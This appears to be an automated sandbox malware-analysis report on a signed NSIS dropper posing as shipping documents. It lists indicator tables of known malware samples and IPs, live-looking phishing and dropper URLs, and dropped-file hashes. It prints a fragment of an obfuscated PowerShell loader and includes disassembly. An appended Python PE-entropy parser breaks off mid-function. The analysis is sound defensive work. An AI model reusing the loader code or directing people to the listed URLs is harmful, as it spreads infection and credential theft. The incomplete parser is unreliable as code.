CLOUDFLARENETUS | https://1drv.ms/o/s!AnrtiNmLLRZglVBmj_pzjvzIvHZ7?e=WnZeS1 | malicious | HtmlDropper | 104.18.94.41
CLOUDFLARENETUS | hnvc.vbs | malicious | PureLog Stealer | 188.114.97.3
CLOUDFLARENETUS | 1e#U0414.exe | malicious | Lokibot | 188.114.96.3
CLOUDFLARENETUS | wm.vbs | malicious | PureLog Stealer, XWorm | 188.114.96.3
CLOUDFLARENETUS | Teklifformu_Ekinoks LS 1087251 04-00000152.exe | malicious | Snake Keylogger | 188.114.96.3
DATACLUB-NL | Ze1Ueabtx5.img | malicious | AgentTesla, GuLoader | 185.29.11.53
DATACLUB-NL | Documenti di spedizione 0009333000459595995.exe | malicious | AgentTesla, GuLoader | 185.29.11.53
DATACLUB-NL | PO 00009876660887666000.bat.exe | malicious | AgentTesla, GuLoader | 84.38.133.121
DATACLUB-NL | Bankcopyscanneddoc.exe | malicious | RedLine | 84.38.129.21
DATACLUB-NL | xCjIO3SCur0S.exe | malicious | Remcos | 185.29.11.23
DATACLUB-NL | new.cmd | malicious | GuLoader | 185.29.11.28
DATACLUB-NL | temp.cmd | malicious | Unknown | 185.29.11.28
DATACLUB-NL | price_request_.exe | malicious | AgentTesla, GuLoader | 185.29.11.62
DATACLUB-NL | disprovable.dll | malicious | CryptOne, Qbot | 84.38.133.191
DATACLUB-NL | BL.xls | malicious | Lokibot | 84.38.129.114
UNIFIEDLAYER-AS-1US | rDieselPlantTechnicalSheet.exe | malicious | DBatLoader | 192.185.31.186
UNIFIEDLAYER-AS-1US | rPO_CW00402902400429.exe | malicious | AgentTesla | 192.185.35.35
UNIFIEDLAYER-AS-1US | Ze1Ueabtx5.img | malicious | AgentTesla, GuLoader | 192.185.13.234
UNIFIEDLAYER-AS-1US | Documenti di spedizione 0009333000459595995.exe | malicious | AgentTesla, GuLoader | 192.185.13.234
UNIFIEDLAYER-AS-1US | Audio_Msg..00290663894983Transcript.html | malicious | HTMLPhisher | 162.215.211.9
UNIFIEDLAYER-AS-1US | rPO_CW00402902400438.exe | malicious | Snake Keylogger, VIP Keylogger | 162.241.27.20
UNIFIEDLAYER-AS-1US | Shipping Document.exe | malicious | AgentTesla | 162.214.80.31
UNIFIEDLAYER-AS-1US | https://wbh.sxx.temporary.site/ | malicious | Unknown | 50.6.160.227
UNIFIEDLAYER-AS-1US | https://pnp.zfx.mybluehost.me/wp-content/it/web/login.php/ | malicious | Unknown | 50.6.153.149
UNIFIEDLAYER-AS-1US | https://hr.schoolrundriver.com/system/fonts/wordpress/CHASE | malicious | Unknown | 192.232.218.112
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | z84TTREMITTANCEUSD347_432_63.exe | malicious | Snake Keylogger, VIP Keylogger | 104.26.13.205
3b5074b1b5d032e5620f69f9f700ff0e | rLegalOpinionCopy_doc.cmd | malicious | VIP Keylogger | 104.26.13.205
3b5074b1b5d032e5620f69f9f700ff0e | update.ps1 | malicious | NetSupport RAT, HTMLPhisher | 104.26.13.205
3b5074b1b5d032e5620f69f9f700ff0e | https://1drv.ms/o/s!AnrtiNmLLRZglVBmj_pzjvzIvHZ7?e=WnZeS1 | malicious | HtmlDropper | 104.26.13.205
3b5074b1b5d032e5620f69f9f700ff0e | https://texicoschools-my.sharepoint.com/:f:/p/bhadley/EsaMKJ-X61dEm1tZEaws2DMBSjLuzfhGBl4pu2aaho1XiQ?e=fJogeV | malicious | Unknown | 104.26.13.205
3b5074b1b5d032e5620f69f9f700ff0e | hnvc.vbs | malicious | PureLog Stealer | 104.26.13.205
3b5074b1b5d032e5620f69f9f700ff0e | wm.vbs | malicious | PureLog Stealer, XWorm | 104.26.13.205
3b5074b1b5d032e5620f69f9f700ff0e | Teklifformu_Ekinoks LS 1087251 04-00000152.exe | malicious | Snake Keylogger | 104.26.13.205
3b5074b1b5d032e5620f69f9f700ff0e | http://mir-belting.com | malicious | Unknown | 104.26.13.205
3b5074b1b5d032e5620f69f9f700ff0e | PO5118000306 pdf.exe | malicious | FormBook | 104.26.13.205
Match: C:\Users\user\AppData\Local\Temp\nsi1309.tmp\nsExec.dll
Associated Sample Name / URL | Detection | Threat Name
Ze1Ueabtx5.img | malicious | AgentTesla, GuLoader
Documenti di spedizione 0009333000459595995.exe | malicious | AgentTesla, GuLoader
4hIPvzV6a2.exe | malicious | Unknown
SecuriteInfo.com.PUA.Tool.InstSrv.10.14191.25974.exe | malicious | Unknown
SecuriteInfo.com.PUA.Tool.InstSrv.10.14191.25974.exe | malicious | Unknown
3Dut8dFCwD.exe | malicious | Unknown
Ms63nDrOBa.exe | malicious | Unknown
SecuriteInfo.com.PUA.Tool.InstSrv.10.1046.23999.exe | malicious | Unknown
SecuriteInfo.com.PUA.Tool.InstSrv.10.1046.23999.exe | malicious | Unknown
rSCAN31804.exe | malicious | GuLoader, Remcos
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:data
                                      Category:modified
                                      Size (bytes):8003
                                      Entropy (8bit):4.840877972214509
                                      Encrypted:false
                                      SSDEEP:192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
                                      MD5:106D01F562D751E62B702803895E93E0
                                      SHA1:CBF19C2392BDFA8C2209F8534616CCA08EE01A92
                                      SHA-256:6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
                                      SHA-512:81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
                                      Malicious:false
                                      Reputation:moderate, very likely benign file
                                      Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Reputation:high, very likely benign file
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Reputation:high, very likely benign file
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):7168
                                      Entropy (8bit):5.2959870663251625
                                      Encrypted:false
                                      SSDEEP:96:JwzdzBzMDhOZZDbXf5GsWvSv1ckne94SDbYkvML1HT1fUNQaSGYuH0DQ:JTQHDb2vSuOc41ZfUNQZGdHM
                                      MD5:B4579BC396ACE8CAFD9E825FF63FE244
                                      SHA1:32A87ED28A510E3B3C06A451D1F3D0BA9FAF8D9C
                                      SHA-256:01E72332362345C415A7EDCB366D6A1B52BE9AC6E946FB9DA49785C140BA1A4B
                                      SHA-512:3A76E0E259A0CA12275FED922CE6E01BDFD9E33BA85973E80101B8025EF9243F5E32461A113BBCC6AA75E40894BB5D3A42D6B21045517B6B3CF12D76B4CFA36A
                                      Malicious:false
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Joe Sandbox View:
• Filename: Ze1Ueabtx5.img, Detection: malicious
• Filename: Documenti di spedizione 0009333000459595995.exe, Detection: malicious
• Filename: 4hIPvzV6a2.exe, Detection: malicious
• Filename: SecuriteInfo.com.PUA.Tool.InstSrv.10.14191.25974.exe, Detection: malicious
• Filename: SecuriteInfo.com.PUA.Tool.InstSrv.10.14191.25974.exe, Detection: malicious
• Filename: 3Dut8dFCwD.exe, Detection: malicious
• Filename: Ms63nDrOBa.exe, Detection: malicious
• Filename: SecuriteInfo.com.PUA.Tool.InstSrv.10.1046.23999.exe, Detection: malicious
• Filename: SecuriteInfo.com.PUA.Tool.InstSrv.10.1046.23999.exe, Detection: malicious
• Filename: rSCAN31804.exe, Detection: malicious
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................,.................Rich...........................PE..L...Q.d...........!......................... ...............................P............@..........................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata..<.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):309691
                                      Entropy (8bit):7.744710277817117
                                      Encrypted:false
                                      SSDEEP:6144:cRFGTUnT0cBFL2/DPFEqINjmfKsC1pzEsvRpbqIYuWCB:cjGwT0kkLFEqqYnC1DvRpqJCB
                                      MD5:B563202661CAE7352789D2700253D473
                                      SHA1:1474AC798166DF321C9F518F27BA4937B7B49F9A
                                      SHA-256:803FF2DA19A7E7AD2182E0CBE2E3B3FD79BB998259B8DD5EBCA7E305677D90FD
                                      SHA-512:F27E1403772AEA0069B50631FE3DA1C64966D8F18BDC54278C55D80212CFEB66AFEA659FD28C97334406935454201C25C01C93364EA0D2F742F53402ADF8AB38
                                      Malicious:false
                                      Preview:.............bb............K.....D...:..............'................G.......????......W...................==....oo...................o..---.......9.......W.```.qqq.s.t.....................]]]]]............V...........nnnnn.........wwwww..G.........................................&....$...a..................................!.(.G......m.....S.i.&..E....;..............\............II........ ................................]]].........................W....................................................... .....@@..................M.\................SSS.......................1...................k.................................w..5..oo._____...iiii.....................#..........XXX......---............KKKKK.......TT.....((((.......z......`..........................).ooo...::...bbbbb...AAAA............*.................bb................R...............;;....................ss...HHHHHHH..................11..*.....f........jj.]............................''..........X..........{.z.&...
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                      Category:dropped
                                      Size (bytes):729960
                                      Entropy (8bit):7.605589195941063
                                      Encrypted:false
                                      SSDEEP:12288:ffLdembnSidCbvZROJ9cDGUugE6X12xKSl1a3qmFLgoXFDsiJjWlWVB0mPH4V:ffLNnSs8r4yDGOE6X12De6mF3XF4i7X2
                                      MD5:4ECAFA8F623606CAF0A925F5C6B2EB10
                                      SHA1:59CB79183B9547B3915C8AA09ED904F84BCAB22C
                                      SHA-256:3FE8F843E696C1DACBDCABED38D7132776915D89B60AC10C68FDA048CBFE044F
                                      SHA-512:D1DC9A1AF2FDF373893A99F16A6CBE7CF0F5C9C3B77936C8535AD0BBA226542C132F562B30551D9C10EE2EF249160E8AF85867ED3B2601198709D0E977A26323
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 26%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN.s~..PN..VH..PN.Rich.PN.........................PE..L...l.d.................j..........25............@.......................................@..........................................P...d..............X............................................................................................text....h.......j.................. ..`.rdata..d............n..............@..@.data...............................@....ndata.......P...........................rsrc....d...P...f..................@..@................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):26
                                      Entropy (8bit):3.95006375643621
                                      Encrypted:false
                                      SSDEEP:3:ggPYV:rPYV
                                      MD5:187F488E27DB4AF347237FE461A079AD
                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                      Malicious:true
                                      Preview:[ZoneTransfer]....ZoneId=0
                                      Process:C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe
                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                      Category:dropped
                                      Size (bytes):72234
                                      Entropy (8bit):5.198340110893828
                                      Encrypted:false
                                      SSDEEP:1536:0dZHAPk4sNvIJYQwAnGjpWRBonT87MOgNW3W:0dZHAPkT4YOGqoTQoYG
                                      MD5:D44AF3867FA92AC621815B9DEB75C8DF
                                      SHA1:71DA815C2858476EECE49E9F2ADC54F8C6B69383
                                      SHA-256:887A1A4BF80BA10088A729662E66F7322B08E7A119F50A805AF6ACF110827375
                                      SHA-512:19E56B70F0A3663570007F4532960E43982176658932A97A7A1CD85D063ED47675CA0D41901994A0E9CF50C3A709D4CE038F006A1E82F3058533D2013C67E5BE
                                      Malicious:false
                                      Preview:$Patentets=$Pitmark5;<#Hematinuria Misassayed Powerdown Castro #><#Perikonens Stalakitterne Betatesternes Apaesthetic #><#Agnatical Spytningens Gorgonize Betagelser #><#Abdikationerne Editioner Kodeskrifternes Bandolerernes #><#Vaabenmrker Astrophotometrical Afskedigelsessituationerne Plexiglassene Assistants Lochs Bindegal #><#Forblffede Galvanotropic Nonimperialistically Strmpefod Listesituationerne Lifefully forenight #>$Paatraengende = "Conflat;Spe mat`$LaanekagLsni gsrHom genuBitonalnskibsdrdM,nosigmStyringo He.otrdNoninsie Rep bllLacta i= I,cita`$AmalgamS Fore.apkrambo l Hubrise Su depnEucaryooAs ortepsig orsa D,snskrReform eAst tetcTotterrt K ubseaAmfibiemMagteslaOutargu;TriaminfDemocrauUninjurn KoderecOksehaltagendeniundfango SuperpnHumaned Chili dMKluppeniSpaadomsmangania UdrejsuLater,ttUdt renhtullesoo Me,rolrInternaiJakobinzParlameeBatussisHyperth Thre od( Sprout`$KmpemyrPH.taerisPa.ochieHarroweu LegropdTerningoskuren,jSimaroue Hal,iorMa nifiv MyrnasiDurkdrenCertaine dilant,
                                      Process:C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):245776
                                      Entropy (8bit):1.2423947315855175
                                      Encrypted:false
                                      SSDEEP:768:7x19EzEPqdI04IDk5wH/o606sFjlhpHi98oiQErpn6jGW3LSSW1Vn+7xd4R89Z9u:13ujvdGpic/cN2q8+js/5/H
                                      MD5:9F9EC5CB34B99692A4EAC963634A7D82
                                      SHA1:5C1C97F3B00365F6CDB43112D31D7DD3AA050870
                                      SHA-256:7579E3606C789ED66E555D541F14BDA6ECAEA4B2EB7B7BC3A25E7C804B3AB48F
                                      SHA-512:A574404306396B333F64FC16256C093CA1F2B6CF87E5675ED678F00DE3B899FFE4A95CBA4D1113B9C86B8C46549D06D7AB97930955F921CD73AE37D4067B1EB0
                                      Malicious:false
                                      Preview:......................................................{............J...............l....................w...........N....................................................................\.........................................|.........................{..............i.................................k...............!......&..............................................................................................................."...........................t.:...s............................................................A...................................................................d.........................2.......|................................................Y............&...............................5.......(................................`..............................*............i..........................................>........................................~.....................................................................................................I
                                      Process:C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):452228
                                      Entropy (8bit):1.250842541049128
                                      Encrypted:false
                                      SSDEEP:768:qlmssNPVJP2ri6hEVTp7WLL1GEOCTOemgej7kcwntQz2Y1drtNhgCV+AhB/7/dR+:5tvPloD3bnq3TzwesbDEfLeaz6oSzjU8
                                      MD5:30C2C02FB78EFAA65C6A38457A7DC4F6
                                      SHA1:40AEF6B9982695F88F0515104BFEEACFAF22FEDA
                                      SHA-256:CE57C2DEDAA3A0FD5F5C267F3336F5ACB6109D00D31A98D4638D26A77939CEFC
                                      SHA-512:8AC0B2E7831C801D7C4043195BEFC309F2C79BE719FF0171D0A4E580671EBADD2F737C307A4AAE2E548705CD11B24FE64F07C6E842D7DD5D3CCD88EA677BC7FA
                                      Malicious:false
                                      Preview:...........................................t..................................................................................................a..............d...........................o.........................=..#..............0.........<.........0.......................>..........`..........................................................................................:.........u.............................................0.................................C..~.............................................X......................................................"............................f........................................w.................................{............................"..................e........................................f...........l...............................................I............................ Z...........................;.............;.................................u.................................................................%....
                                      Process:C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):328009
                                      Entropy (8bit):1.2551228776153396
                                      Encrypted:false
                                      SSDEEP:1536:AfCPIKQLWsgBwj5eZNb+h+QkSGkJPsGyksKU:ATKZNbTQkSGky0sKU
                                      MD5:78C7002A6C29415CEA767894F99BDF01
                                      SHA1:37B39AF4E61D2A97D1B1AEA54D1C3C3D8C3AD6D8
                                      SHA-256:414BB9BB930F1269088CF9BF027667E6B9A4130E6E719E7C178406A8C8C3183E
                                      SHA-512:A39B5656AF287783AB4C5E211C148D2D233AB635E8D8C4870693D31267904E9C94A3BCC07B20F92C55F68BC7E6E2B5F1D22C6ED3F9B3A729CABD14B2E7B58D58
                                      Malicious:false
                                      Preview:..............................................A............................................]..............2.................................N.................................................................................................................................i.......................................................................................X............h...................j...........,............)...w....................................R.................................V...............................................................R.../.........................................)...................................................].............................,...v............................................./.......................................`........)........#..........x............H.....................................v..........K..........................................................................................................*............................
                                      Process:C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):453
                                      Entropy (8bit):4.241518252490206
                                      Encrypted:false
                                      SSDEEP:6:mTXCFWRbo5FpTNrQNFqqhq48RZ8av8Atp3d6G4bg3pCp+oWKHYAtpcRvFVTZqIMC:0X4OA7aY48MNAtDMeExYAYdfqI1f1o2
                                      MD5:261F38F05E7DE27DA302C07B62E1F94D
                                      SHA1:8D495D43FC7A2B40C52B8D31678F24B519257610
                                      SHA-256:50D950EE2F6CD5D31AAA35B913DC46C8EEE3120B7444EF5EBB302B88851F3328
                                      SHA-512:62106A1D3608A63C12D6E9A7A00FD775ECD38193B779D4C13E18850230F1C7A1F0BD5DF0602AF5553F24BB0BAD6703BB9DC00C09C14E91DD098CE4EC95050E47
                                      Malicious:false
                                      Preview:stulls sprttede trlkvinder materialerne,disciplinerendes antirailwayist topchefs dhyana behovsanalyserne,vager cimnel bonderve debitable karyotin sadelmagervrkstederne samfundskonomien plakatopstning horologe vaner taleruafhaengigt..flimmer carryout arbejdsdisketterne breakaxe vidtaabne elastose.attestationerne mennonist rubicon barogrammerne respectively reddet overretention,brdknivenes yndlingsbog ministate paleogeographically repenalize henriett.
                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                      Entropy (8bit):7.605589195941063
                                      TrID:
                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                      • DOS Executable Generic (2002/1) 0.02%
                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                      File name:Shipping documents 000022999878999800009999.exe
                                      File size:729'960 bytes
                                      MD5:4ecafa8f623606caf0a925f5c6b2eb10
                                      SHA1:59cb79183b9547b3915c8aa09ed904f84bcab22c
                                      SHA256:3fe8f843e696c1dacbdcabed38d7132776915d89b60ac10c68fda048cbfe044f
                                      SHA512:d1dc9a1af2fdf373893a99f16a6cbe7cf0f5c9c3b77936c8535ad0bba226542c132f562b30551d9c10ee2ef249160e8af85867ed3b2601198709d0e977a26323
                                      SSDEEP:12288:ffLdembnSidCbvZROJ9cDGUugE6X12xKSl1a3qmFLgoXFDsiJjWlWVB0mPH4V:ffLNnSs8r4yDGOE6X12De6mF3XF4i7X2
                                      TLSH:4CF412047FBCD2E3C0D42A7E59B6834B2BF0A25751090F17B214AF5EAC5D2D6950AFE8
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN..s~..PN..VH..PN.Rich.PN.........................PE..L...l..d.................j.........
                                      Icon Hash:2b25372d4e5ad12f
                                      Entrypoint:0x403532
                                      Entrypoint Section:.text
                                      Digitally signed:true
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                      Time Stamp:0x64A0DC6C [Sun Jul 2 02:09:48 2023 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:4
                                      OS Version Minor:0
                                      File Version Major:4
                                      File Version Minor:0
                                      Subsystem Version Major:4
                                      Subsystem Version Minor:0
                                      Import Hash:f4639a0b3116c2cfc71144b88a929cfd
                                      Signature Valid:false
                                      Signature Issuer:CN="Ophugningen Maeonides ", O=Raatret, L=Flagstaff, S=Arizona, C=US
                                      Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                      Error Number:-2146762487
                                      Not Before, Not After
                                      • 24/12/2023 12:28:21 23/12/2026 12:28:21
                                      Subject Chain
                                      • CN="Ophugningen Maeonides ", O=Raatret, L=Flagstaff, S=Arizona, C=US
                                      Version:3
                                      Thumbprint MD5:B7FC25FDC76F19849826C649699B6B9B
                                      Thumbprint SHA-1:3B09DDF7435AE977C88A85277838BE6C095F73D5
                                      Thumbprint SHA-256:290642CA085C9EE9159E8262A26D3C642EFA1B94CCA16BC01E460C6D1529CC3A
                                      Serial:197015574DF969D30A05FE16D98927E74E8458B0
                                      Instruction
                                      sub esp, 000003F8h
                                      push ebp
                                      push esi
                                      push edi
                                      push 00000020h
                                      pop edi
                                      xor ebp, ebp
                                      push 00008001h
                                      mov dword ptr [esp+20h], ebp
                                      mov dword ptr [esp+18h], 0040A2D8h
                                      mov dword ptr [esp+14h], ebp
                                      call dword ptr [004080A4h]
                                      mov esi, dword ptr [004080A8h]
                                      lea eax, dword ptr [esp+34h]
                                      push eax
                                      mov dword ptr [esp+4Ch], ebp
                                      mov dword ptr [esp+0000014Ch], ebp
                                      mov dword ptr [esp+00000150h], ebp
                                      mov dword ptr [esp+38h], 0000011Ch
                                      call esi
                                      test eax, eax
                                      jne 00007F31FCEC334Ah
                                      lea eax, dword ptr [esp+34h]
                                      mov dword ptr [esp+34h], 00000114h
                                      push eax
                                      call esi
                                      mov ax, word ptr [esp+48h]
                                      mov ecx, dword ptr [esp+62h]
                                      sub ax, 00000053h
                                      add ecx, FFFFFFD0h
                                      neg ax
                                      sbb eax, eax
                                      mov byte ptr [esp+0000014Eh], 00000004h
                                      not eax
                                      and eax, ecx
                                      mov word ptr [esp+00000148h], ax
                                      cmp dword ptr [esp+38h], 0Ah
                                      jnc 00007F31FCEC3318h
                                      and word ptr [esp+42h], 0000h
                                      mov eax, dword ptr [esp+40h]
                                      movzx ecx, byte ptr [esp+3Ch]
                                      mov dword ptr [004347B8h], eax
                                      xor eax, eax
                                      mov ah, byte ptr [esp+38h]
                                      movzx eax, ax
                                      or eax, ecx
                                      xor ecx, ecx
                                      mov ch, byte ptr [esp+00000148h]
                                      movzx ecx, cx
                                      shl eax, 10h
                                      or eax, ecx
                                      movzx ecx, byte ptr [esp+0000004Eh]
                                      Programming Language:
                                      • [EXP] VC++ 6.0 SP5 build 8804
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8608 | 0xa0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x65000 | 0x264e8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0xb1a10 | 0x958 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2a8 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x68d8 | 0x6a00 | 742185983fa6320c910f81782213e56f | False | 0.6695165094339622 | data | 6.478461709868021 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8000 | 0x1464 | 0x1600 | a995b118b38426885fc6ccaa984c8b7a | False | 0.4314630681818182 | data | 4.969091535632612 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xa000 | 0x2a818 | 0x600 | 9a9bf385a30f1656fc362172b16d9268 | False | 0.5247395833333334 | data | 4.172601271908501 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x35000 | 0x30000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x65000 | 0x264e8 | 0x26600 | 8c15b9178dda9297a3b68e6314e77cb0 | False | 0.48827488802931596 | data | 5.053989943267582 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
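The section table above reports per-section entropy and a raw size next to a virtual size; the combination is what an analyst reads to spot packed code (high-entropy executable section) or regions that are only populated at run time (virtual size far larger than raw size, as with .data here, or a zero-raw uninitialized section like .ndata). The following is an added example, not code from Joe Sandbox or from the sample: a minimal PE section-header parser that computes Shannon entropy per section and applies those heuristics. The PE bytes, the section names and the thresholds (7.0 bits, 8x ratio) are this example's own constructed choices, not values taken from the report.

```python
# Added example (not Joe Sandbox code): parse IMAGE_SECTION_HEADERs from raw
# PE bytes, compute per-section Shannon entropy and apply simple packer
# heuristics. The PE below is constructed inline for the demo; it parses
# correctly but is not a loadable executable.
import math
import struct

IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_CNT_UNINITIALIZED_DATA = 0x00000080
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000

SECTION_HDR = struct.Struct("<8sIIIIIIHHI")  # IMAGE_SECTION_HEADER, 40 bytes


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for empty or constant data, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def parse_sections(pe: bytes) -> list:
    """Walk DOS header -> PE signature -> COFF header -> section headers."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    num_sections = struct.unpack_from("<H", pe, e_lfanew + 6)[0]
    size_opt = struct.unpack_from("<H", pe, e_lfanew + 20)[0]
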